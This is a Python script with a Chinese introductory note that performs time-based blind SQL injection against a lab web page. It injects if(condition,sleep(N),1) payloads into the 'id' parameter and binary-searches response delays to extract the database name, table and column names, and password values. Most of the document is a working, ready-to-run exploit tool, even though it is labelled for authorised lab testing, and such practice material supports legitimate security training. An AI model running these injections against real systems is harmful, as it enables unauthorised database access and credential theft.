经测试发现,无论注入的 payload 条件为真还是为假,页面返回的内容都完全相同,因此无法使用布尔盲注(bool-based);只能改用基于 sleep() 响应时延的时间盲注,下面的脚本即按此思路实现。
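#encoding=utf-8
"""Time-based blind SQL injection extractor for the ``id`` parameter of ``url``.

The target page renders identically for true and false conditions, so no
boolean oracle is available.  Every yes/no question is therefore wrapped in
``if(<cond>,sleep(N),1)`` and answered by measuring the response time.  Each
extractor below asks one question per HTTP request and binary-searches the
byte value of every character, stopping at the end of the string.

Intended for authorised testing against the lab target only.
"""
import os
import time
from typing import Callable, List, Optional

# Target endpoint; the injection point is the ``id`` GET parameter.
url = "http://192.168.182.130:8001/sqli/04.php"

# Seconds the injected sleep() asks for.  A response that takes at least this
# long is interpreted as "condition true".  Ordinary round-trip latency must
# stay well below it, otherwise false positives creep in; raise it on a slow
# or noisy link.
SLEEP_SECONDS = 1

# Hard per-request timeout so an unreachable target cannot hang the scan
# forever.  Must comfortably exceed SLEEP_SECONDS plus worst-case latency.
REQUEST_TIMEOUT = SLEEP_SECONDS + 10

# Highest byte value probed per character.  Anything above it saturates to
# this value, so the tool is only accurate for ASCII data (MySQL ORD() of a
# multi-byte character is larger than 255 in any case).
MAX_ORD = 127

# An oracle answers "does the database evaluate this SQL boolean expression
# to true?".  The default one uses the sleep() side channel; a caller may
# supply another (e.g. a boolean-based one on a target that does leak a
# visible difference, or a fake one in unit tests).
Oracle = Callable[[str], bool]


def _time_oracle(condition: str) -> bool:
    """Evaluate *condition* on the target through the sleep() side channel.

    Args:
        condition: a MySQL boolean expression, e.g. ``length(database())=7``.

    Returns:
        True if the response took at least SLEEP_SECONDS, i.e. the injected
        ``sleep()`` executed because *condition* held.

    Raises:
        requests.RequestException: on connection failure or when the request
            exceeds REQUEST_TIMEOUT (reported as an error, never as "true").
    """
    # Imported here so the extraction logic can be imported and exercised
    # with a fake oracle on a machine that lacks ``requests``.
    import requests

    # ``--+``: the ``+`` decodes to a space, giving MySQL the required
    # ``-- `` comment so the rest of the original query is discarded.
    payload = "?id=if({},sleep({}),1)--+".format(condition, SLEEP_SECONDS)
    started = time.monotonic()  # monotonic: immune to wall-clock adjustments
    requests.get(url=url + payload, timeout=REQUEST_TIMEOUT)
    return time.monotonic() - started >= SLEEP_SECONDS


def _extract_string(sql_expr: str, max_len: int, oracle: Oracle,
                    verbose: bool = True) -> str:
    """Recover the string value of *sql_expr* one character at a time.

    Args:
        sql_expr: a MySQL scalar expression or subquery, without outer
            parentheses, e.g. ``select database()``.
        max_len: upper bound on the number of characters to recover.
        oracle: see ``Oracle``.
        verbose: print the partial result after every character, as progress
            feedback (each character costs about seven slow requests).

    Returns:
        The recovered string (ASCII only, see MAX_ORD), truncated to
        *max_len* characters.
    """
    chars: List[str] = []
    for pos in range(1, max_len + 1):
        # Binary search for the smallest v in [0, MAX_ORD] with ord(char) <= v,
        # asking "ord(char) > mid?" each round.
        lo, hi = 0, MAX_ORD
        while lo < hi:
            mid = (lo + hi) >> 1
            if oracle("ord(mid(({}),{},1))>{}".format(sql_expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        # MySQL's ORD('') is 0, so reading past the end of the value resolves
        # to 0: stop here instead of padding the result with bogus characters.
        if lo == 0:
            break
        chars.append(chr(lo))
        if verbose:
            print("the result is {}".format("".join(chars)))
    return "".join(chars)


def DbLen(max_len: int = 9, *, oracle: Optional[Oracle] = None) -> Optional[int]:
    """Find the length of the current database name by trying 1..max_len.

    Prints ``DB length is N`` on success.

    Returns:
        The length, or None when no candidate matched (the name is longer
        than *max_len*, or the oracle is unreliable).
    """
    oracle = oracle or _time_oracle
    for length in range(1, max_len + 1):
        if oracle("length(database())={}".format(length)):
            print("DB length is " + str(length))
            return length
    return None


def DbName(max_len: int = 64, *, oracle: Optional[Oracle] = None) -> str:
    """Recover the current database name (``database()``).

    *max_len* defaults to 64, MySQL's identifier length limit; extraction
    stops early at the end of the name anyway.
    """
    return _extract_string("select database()", max_len, oracle or _time_oracle)


def TablesName(max_len: int = 49, *, oracle: Optional[Oracle] = None) -> str:
    """Recover the comma-separated table names of the current database.

    ``group_concat`` output is capped server-side by ``group_concat_max_len``
    (1024 bytes by default), so very large schemas are truncated regardless
    of *max_len*.
    """
    return _extract_string(
        "select group_concat(table_name) from information_schema.tables"
        " where table_schema=database()",
        max_len, oracle or _time_oracle)


def ColumnsName(table: str = "users", max_len: int = 29, *,
                oracle: Optional[Oracle] = None) -> str:
    """Recover the comma-separated column names of *table* in the current DB."""
    return _extract_string(
        "select group_concat(column_name) from information_schema.columns"
        " where table_schema=database() and table_name='{}'".format(table),
        max_len, oracle or _time_oracle)


def GetData(table: str = "iwebsec.users", column: str = "password",
            max_len: int = 49, *, oracle: Optional[Oracle] = None) -> str:
    """Recover the comma-separated values of *column* from *table*.

    *table* may be schema-qualified; the defaults match the lab target.
    """
    return _extract_string(
        "select group_concat({}) from {}".format(column, table),
        max_len, oracle or _time_oracle)


if __name__ == "__main__":
    # Same sequence as the original script; guarded so importing this module
    # (e.g. to reuse the extractors) does not fire requests at the target.
    DbLen()
    DbName()
    TablesName()
    ColumnsName()
    GetData()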